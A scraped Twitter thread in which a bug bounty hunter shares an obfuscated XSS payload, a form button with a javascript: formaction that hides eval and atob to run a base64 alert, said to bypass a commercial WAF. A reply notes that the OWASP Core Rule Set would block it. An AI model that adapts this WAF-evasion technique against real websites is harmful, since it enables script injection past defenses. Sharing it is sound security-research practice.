.
It's a food chain. The @OWASP @CoreRuleSet eats your payload for breakfast. Anomaly score 35 at Paranoia Level 1. The default installation blocks with a score of greater equal 5.
What WAF lets this pass?
Just ate a well-known WAF for breakfast.
<form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));//
See picture for detailed explanation and tips. #bugbounty #bugbountytip
Kudos: @PortSwiggerRes, @brutelogic, @wugeej .pic.twitter.com/4Phkolgoso
-
-
-
Interesting, thanks for the info! It's a WAF provided by a CBSP. I guess they should look more into
@CoreRuleSet although my payload may have worked due context. Context was JSON data in a URL.
Kraj razgovora
Novi razgovor -
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.